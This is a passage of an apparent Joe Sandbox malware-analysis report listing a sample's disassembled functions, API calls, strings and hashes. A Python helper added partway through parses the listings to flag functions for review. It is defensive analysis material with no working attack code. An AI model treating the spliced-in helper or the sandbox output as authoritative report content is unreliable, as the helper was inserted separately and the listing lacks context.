                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                              • Instruction ID: b3a318212c5062f189f23809adb25ecec48984d52fb4ef4cfd331af49e1d523c
                                                              • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                              • Instruction Fuzzy Hash: 15114271A82B08A6F560B772CC47FCB7BAC9F10B09F440C1EB29D66092DA69B5058754
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0043E669,0043E5CC,0043E86D), ref: 0043E605
                                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0043E61B
                                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0043E630
                                                               Memory Dump Source
                                                               • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                              • API String ID: 667068680-1718035505
                                                              • Opcode ID: 70963bd294787b6a819fdf9ef78b535da0a64812aa9966ca0875c57bce6cee81
                                                              • Instruction ID: cb152600c8634c42ad4400e5286112bbd98a106a4dcfc6e30bd9ff88458fb3f7
                                                              • Opcode Fuzzy Hash: 70963bd294787b6a819fdf9ef78b535da0a64812aa9966ca0875c57bce6cee81
                                                              • Instruction Fuzzy Hash: ADF0C2317823229B0F214E675C9667B62CC6A3D796B50283FE901D33E1EB1CCC566B9D
                                                              APIs
                                                              • _free.LIBCMT ref: 0044891E
                                                                • Part of subcall function 00448DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0044C896,?,00000000,?,00000000,?,0044C8BD,?,00000007,?,?,0044CCBA,?), ref: 00448DE2
                                                                • Part of subcall function 00448DCC: GetLastError.KERNEL32(?,?,0044C896,?,00000000,?,00000000,?,0044C8BD,?,00000007,?,?,0044CCBA,?,?), ref: 00448DF4
                                                              • _free.LIBCMT ref: 00448930
                                                              • _free.LIBCMT ref: 00448943
                                                              • _free.LIBCMT ref: 00448954
                                                              • _free.LIBCMT ref: 00448965
                                                               Memory Dump Source
                                                               • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID: pE
                                                              • API String ID: 776569668-674470523
                                                              • Opcode ID: 05ab138cf1a50fde9a60993c3fb55653b54eeab66eeeb7dba4006742c9b467fc
                                                              • Instruction ID: 772c1eb9bd9017bf6c00c0d68e1c2c961e426b473ea2c3ccc9e139e193f8d863
                                                              • Opcode Fuzzy Hash: 05ab138cf1a50fde9a60993c3fb55653b54eeab66eeeb7dba4006742c9b467fc
                                                              • Instruction Fuzzy Hash: 88F0D0B18116129B96466F15FE0241D3BA1F724725301096FF514973B2DBBA8A419B8D
                                                              APIs
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 004314C2
                                                                • Part of subcall function 0042B146: GetVersionExW.KERNEL32(?), ref: 0042B16B
                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004314E6
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00431500
                                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00431513
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00431523
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00431533
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                              • String ID:
                                                              • API String ID: 2092733347-0
                                                              • Opcode ID: 0e2c7edfe98459c3374fa654bfc517c7a843e603aa4801a8ea06ad85069ff4fc
                                                              • Instruction ID: f9e52cbc042615e5891ecdcae125770eefe6d4d7a96b3e68afab6f4e64ad7dee
                                                              • Opcode Fuzzy Hash: 0e2c7edfe98459c3374fa654bfc517c7a843e603aa4801a8ea06ad85069ff4fc
                                                              • Instruction Fuzzy Hash: 2731F875108315ABC700DFA8C88499BB7F8FF98755F005A2EF995C3210E734D509CBAA
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,00442AF1,004402FC,0043FA34), ref: 00442B08
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00442B16
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00442B2F
                                                              • SetLastError.KERNEL32(00000000,00442AF1,004402FC,0043FA34), ref: 00442B81
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: 0751685899d5bfa1561e823fa9f29f9e7c780bd8f0308a0e8c896a837014d2ea
                                                              • Instruction ID: 066c20a300f59e892fac32fac8a4d939ebc0c8a3d80e4cca22f8782fcfc5fffb
                                                              • Opcode Fuzzy Hash: 0751685899d5bfa1561e823fa9f29f9e7c780bd8f0308a0e8c896a837014d2ea
                                                              • Instruction Fuzzy Hash: F00124325097112EB6182F767E8592B2F59EB45BBBBE0033FF110511E2EF99EE00910C
                                                              APIs
                                                              • GetLastError.KERNEL32(?,00461030,00444674,00461030,?,?,00443F73,00000050,?,00461030,00000200), ref: 004497E9
                                                              • _free.LIBCMT ref: 0044981C
                                                              • _free.LIBCMT ref: 00449844
                                                              • SetLastError.KERNEL32(00000000,?,00461030,00000200), ref: 00449851
                                                              • SetLastError.KERNEL32(00000000,?,00461030,00000200), ref: 0044985D
                                                              • _abort.LIBCMT ref: 00449863
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free$_abort
                                                              • String ID:
                                                              • API String ID: 3160817290-0
                                                              • Opcode ID: a5b94c9974f8478199768b44e1d8cce86bfa67762a14d16ae204a8704c25b19b
                                                              • Instruction ID: b64dd4c20fd7321b5e447523f47e650e2998cba55215519051c9525a81010630
                                                              • Opcode Fuzzy Hash: a5b94c9974f8478199768b44e1d8cce86bfa67762a14d16ae204a8704c25b19b
                                                              • Instruction Fuzzy Hash: F7F0F43515070166F752372A6C0AB1F2A658FE2B7AF31003FF524922D3EE2CCC02616D
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0043DC47
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0043DC61
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0043DC72
                                                              • TranslateMessage.USER32(?), ref: 0043DC7C
                                                              • DispatchMessageW.USER32(?), ref: 0043DC86
                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0043DC91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                              • String ID:
                                                              • API String ID: 2148572870-0
                                                              • Opcode ID: e8b3268d1161cd59b406e58754840344323f1ff8e4c547dec3ef584cfc814ddf
                                                              • Instruction ID: 7fa27d0fccddbf5a4d71648746517bf72ae46f91c925764f37f38cd884121d04
                                                              • Opcode Fuzzy Hash: e8b3268d1161cd59b406e58754840344323f1ff8e4c547dec3ef584cfc814ddf
                                                              • Instruction Fuzzy Hash: 13F03C72A01219BBCB206FA5EC4CDCF7F6DEF46B92F004521B50AD2055D678D646CBA4
                                                              APIs
                                                                • Part of subcall function 0043A699: GetDC.USER32(00000000), ref: 0043A69D
                                                                • Part of subcall function 0043A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0043A6A8
                                                                • Part of subcall function 0043A699: ReleaseDC.USER32(00000000,00000000), ref: 0043A6B3
                                                              • GetObjectW.GDI32(?,00000018,?), ref: 0043A83C
                                                                • Part of subcall function 0043AAC9: GetDC.USER32(00000000), ref: 0043AAD2
                                                                • Part of subcall function 0043AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0043AB01
                                                                • Part of subcall function 0043AAC9: ReleaseDC.USER32(00000000,?), ref: 0043AB99
                                                               Memory Dump Source
                                                               • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ObjectRelease$CapsDevice
                                                              • String ID: "C$($AC
                                                              • API String ID: 1061551593-810783929
                                                              • Opcode ID: 999e508a59e978ce888732d97ba7bb55bd4a45e82338013c8ef7a8a75377b212
                                                              • Instruction ID: 28487f3a4087df8e0025db1315eb53ee8f794711a0c603c53b1181d3a9af43e1
                                                              • Opcode Fuzzy Hash: 999e508a59e978ce888732d97ba7bb55bd4a45e82338013c8ef7a8a75377b212
                                                              • Instruction Fuzzy Hash: 9391F071608744AFD710DF25C844A2BBBE8FFC9701F00496EF99AD7221DB34A906CB66
                                                              APIs
                                                                • Part of subcall function 004305DA: _wcslen.LIBCMT ref: 004305E0
                                                                • Part of subcall function 0042B92D: _wcsrchr.LIBVCRUNTIME ref: 0042B944
                                                              • _wcslen.LIBCMT ref: 0042C197
                                                              • _wcslen.LIBCMT ref: 0042C1DF
                                                               Memory Dump Source
                                                               • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$_wcsrchr
                                                              • String ID: .exe$.rar$.sfx
                                                              • API String ID: 3513545583-31770016
                                                              • Opcode ID: 7d4f00878c012dde422700f58044e2d75827f0844f5132c8d956ec56b5336766
                                                              • Instruction ID: bd0ca6e701e38b0c4d6e7f51e4580084a0d38b6f946fcdd9bb59855d0639d456
                                                              • Opcode Fuzzy Hash: 7d4f00878c012dde422700f58044e2d75827f0844f5132c8d956ec56b5336766
                                                              • Instruction Fuzzy Hash: 7041172160037195C731AF64A892A7FB3A4EF45748F64490FF9816B282EF9D4D91C39E
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 0042BB27
                                                              • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0042A275,?,?,00000800,?,0042A23A,?,0042755C), ref: 0042BBC5
                                                              • _wcslen.LIBCMT ref: 0042BC3B
                                                               Memory Dump Source
                                                               • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$CurrentDirectory
                                                              • String ID: UNC$\\?\
                                                              • API String ID: 3341907918-253988292
                                                              • Opcode ID: bd66879104271c51be1bde31eb49f97b714de31bf54a65ac3294d655d02d2d98
                                                              • Instruction ID: ee7395160916719d731f41ea49938048985ad516270e3110f29964d0d951928c
                                                              • Opcode Fuzzy Hash: bd66879104271c51be1bde31eb49f97b714de31bf54a65ac3294d655d02d2d98
                                                              • Instruction Fuzzy Hash: AE41D471600225B6DF21AF22EC01EEB7768EF44385F54412FF854A3241DB78EA908ADC
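Triage helper for function listings in the layout above, added here as an example and not part of the Joe Sandbox report or of the sample it describes. It parses the per-function blocks (the APIs lines and the API ID / String ID / Opcode ID fields under Similarity) from a constructed excerpt of this page and separates C-runtime plumbing (_free, GetLastError, the FLS and time-conversion helpers) from functions worth opening in the disassembler, such as the one carrying the .exe / .rar / .sfx strings or the GetProcAddress resolution of AcquireSRWLockExclusive. The RUNTIME_NOISE set and the flagging rules are our own assumptions, not anything Joe Sandbox emits, and the `$` separator in String ID is ambiguous whenever a string itself contains `$` (compare the "C$($AC entry above).

```python
# Added example: parse Joe Sandbox "IDA Plugin" function blocks and triage them.
# Not code from the report or the sample; RUNTIME_NOISE and the rules are assumptions.
import re
from dataclasses import dataclass, field

# Constructed excerpt in the report's layout (three entries from this page, trimmed).
SAMPLE = """\
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0043E669,0043E5CC,0043E86D), ref: 0043E605
• GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0043E61B
• GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0043E630
Similarity
• API ID: AddressProc$HandleModule
• String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
• Opcode ID: 70963bd294787b6a819fdf9ef78b535da0a64812aa9966ca0875c57bce6cee81
APIs
  • Part of subcall function 004305DA: _wcslen.LIBCMT ref: 004305E0
• _wcslen.LIBCMT ref: 0042C197
Similarity
• API ID: _wcslen$_wcsrchr
• String ID: .exe$.rar$.sfx
• Opcode ID: 7d4f00878c012dde422700f58044e2d75827f0844f5132c8d956ec56b5336766
APIs
• _free.LIBCMT ref: 0044C8F2
  • Part of subcall function 00448DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0044C896,?), ref: 00448DE2
• _free.LIBCMT ref: 0044C8FD
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
"""

# One API line: optional "Part of subcall function XXXX:", Name.MODULE, optional "(args)", "ref: ADDR".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
FIELD_RE = re.compile(r"^\s*•\s*(API ID|String ID|Opcode ID):\s*(.*)$")
EXT_RE = re.compile(r"^\.[A-Za-z0-9]{2,4}$")  # ".exe", ".rar", ".sfx", ...

# Assumed noise: CRT/vcruntime helpers plus error-code and time plumbing of MSVC binaries.
RUNTIME_NOISE = {
    "_free", "_abort", "_wcslen", "_wcsrchr", "_wcschr", "RtlFreeHeap",
    "GetLastError", "SetLastError", "___vcrt_FlsGetValue", "___vcrt_FlsSetValue",
    "SystemTimeToFileTime", "FileTimeToSystemTime", "LocalFileTimeToFileTime",
    "TzSpecificLocalTimeToSystemTime", "GetVersionExW"}

@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)  # (name, module, ref, subcall addr or None)
    api_id: str = ""
    strings: list = field(default_factory=list)
    opcode_id: str = ""

def parse_listing(text):
    """One FunctionEntry per 'APIs' header; unrelated report lines are ignored."""
    entries, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m, f = API_RE.match(line), FIELD_RE.match(line)
        if m:
            cur.apis.append((m["name"], m["module"], m["ref"], m["sub"]))
        elif f:
            key, val = f.group(1), f.group(2).strip()
            if key == "API ID":
                cur.api_id = val
            elif key == "Opcode ID":
                cur.opcode_id = val
            else:  # caveat: '$' is the separator, so a string containing '$' splits wrongly
                cur.strings = [s for s in val.split("$") if s]
    return entries

def triage(entry):
    """Return (verdict, reasons); only the function's own calls count, not subcalls."""
    reasons = []
    direct = {name for name, _, _, sub in entry.apis if sub is None}
    unknown = sorted(direct - RUNTIME_NOISE)
    if unknown:
        reasons.append("non-runtime APIs: " + ", ".join(unknown))
    if "GetProcAddress" in direct:  # dynamic import resolution: record what gets resolved
        exports = [s for s in entry.strings if not s.upper().endswith(".DLL")]
        reasons.append("resolves exports by name: " + ", ".join(exports))
    exts = [s for s in entry.strings if EXT_RE.match(s)]
    if exts:
        reasons.append("file-extension strings: " + ", ".join(exts))
    if any(s == "UNC" or s.startswith("\\\\?\\") for s in entry.strings):
        reasons.append("long-path / UNC prefix handling")
    return ("review" if reasons else "runtime boilerplate"), reasons

def summarize(text):
    """[(opcode id prefix, verdict, reasons), ...] for every entry in the listing."""
    return [(e.opcode_id[:12], *triage(e)) for e in parse_listing(text)]
```

Run `summarize(open("listing.txt").read())` over a copied function listing to get one verdict per block; anything marked "review" is what an analyst opens first, and the Opcode ID prefix lets you find the block again in the report.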
                                                              APIs
                                                              • _wcschr.LIBVCRUNTIME ref: 0043CD84
                                                                • Part of subcall function 0043AF98: _wcschr.LIBVCRUNTIME ref: 0043B033
                                                                • Part of subcall function 00431FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0042C116,00000000,.exe,?,?,00000800,?,?,?,00438E3C), ref: 00431FD1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcschr$CompareString
                                                              • String ID: <$HIDE$MAX$MIN
                                                              • API String ID: 69343711-3358265660
                                                              • Opcode ID: b44b8847097770e2f9e76823620c51de8b55a901127d061a7f99fff130781b8a
                                                              • Instruction ID: 69eeec6bd513be9c3572e8efe408e6aa32bf3361df08ca19b4fb37219569561c
                                                              • Opcode Fuzzy Hash: b44b8847097770e2f9e76823620c51de8b55a901127d061a7f99fff130781b8a
                                                              • Instruction Fuzzy Hash: E63187719002199ADF25DB51DC41EEF73BCEB18354F405167F905E7180EBB89E848FA5
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 0043AAD2
                                                              • GetObjectW.GDI32(?,00000018,?), ref: 0043AB01
                                                              • ReleaseDC.USER32(00000000,?), ref: 0043AB99
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ObjectRelease
                                                              • String ID: -C$7C
                                                              • API String ID: 1429681911-1043828020
                                                              • Opcode ID: 867b403495edac99bfdc7fd8534c24bdd85486ce896edbf5e55ec044cbad6656
                                                              • Instruction ID: 4c15cfe69baf0cedc5c7ffab42a99fdd61a25bd94c4a198356b5acfa31032900
                                                              • Opcode Fuzzy Hash: 867b403495edac99bfdc7fd8534c24bdd85486ce896edbf5e55ec044cbad6656
                                                              • Instruction Fuzzy Hash: FB212A72108304EFD3019FA5DC48E6FBFE9FB8EB52F04082DFA45A2124D7319A548B66
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 0042B9B8
                                                                • Part of subcall function 00424092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004240A5
                                                              • _wcschr.LIBVCRUNTIME ref: 0042B9D6
                                                              • _wcschr.LIBVCRUNTIME ref: 0042B9E6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                              • String ID: %c:\
                                                              • API String ID: 525462905-3142399695
                                                              • Opcode ID: 0a211b8bc4b01694b9c60177233dce869e33cb87067d9f9b345ffe4cdeff9360
                                                              • Instruction ID: 8ce269965ff2d4699a60898998a2e7610b2d1abb78631ec5c0e3437fc6934259
                                                              • Opcode Fuzzy Hash: 0a211b8bc4b01694b9c60177233dce869e33cb87067d9f9b345ffe4cdeff9360
                                                              • Instruction Fuzzy Hash: CB0149A320032165AA306B36AC45D2BB39CEE85770BD0440FF544D7282EB68E84082F9
                                                              APIs
                                                                • Part of subcall function 00421316: GetDlgItem.USER32(00000000,00003021), ref: 0042135A
                                                                • Part of subcall function 00421316: SetWindowTextW.USER32(00000000,004535F4), ref: 00421370
                                                              • EndDialog.USER32(?,00000001), ref: 0043B2BE
                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0043B2D6
                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 0043B304
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                               • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
